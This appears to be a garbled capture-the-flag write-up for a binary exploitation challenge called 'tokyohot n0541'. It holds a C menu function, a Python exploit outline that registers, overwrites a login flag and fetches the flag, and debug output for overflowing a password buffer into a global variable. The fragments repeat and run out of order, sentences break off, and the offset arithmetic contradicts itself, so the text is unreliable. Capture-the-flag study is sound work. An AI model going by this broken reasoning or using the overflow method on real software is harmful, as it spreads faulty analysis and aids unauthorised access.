user_t users[10]; int logged_in = 0;
(CTF challenge, binary exploitation / reverse‑engineering) 1. Overview | Category | Service | Difficulty | Points | |----------|---------|------------|--------| | Binary / Reversing | tokyohot – n0541 | Medium‑Hard | 452 |
def main(): s = socket.create_connection((HOST, PORT)) register(s) login_overwrite(s) get_flag(s) s.close() tokyohot n0541
#define _GNU_SOURCE #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h>
$ ./n0541 1) Register > 1 Name: AAAAA... Password: BBBBB... [debug] pwd ptr = 0x603090 The global logged_in lives at 0x603200 . The distance is: user_t users[10]; int logged_in = 0; (CTF challenge,
0x603200 - 0x603090 = 0x70 (112) bytes The password buffer is only 0x80 (128) bytes, so we have of headroom before we start overwriting logged_in .
The challenge is a 64‑bit ELF binary that runs locally on the provided Docker image. It listens on a TCP port (or can be run interactively) and offers a simple menu‑driven interface. The goal is to gain a remote shell (or read the flag) by exploiting a vulnerability in the program. [debug] pwd ptr = 0x603090 The global logged_in
void menu(void) puts("\n--- TokyoHot ---"); puts("1) Register"); puts("2) Login"); puts("3) Show secret"); puts("4) Exit"); printf("> ");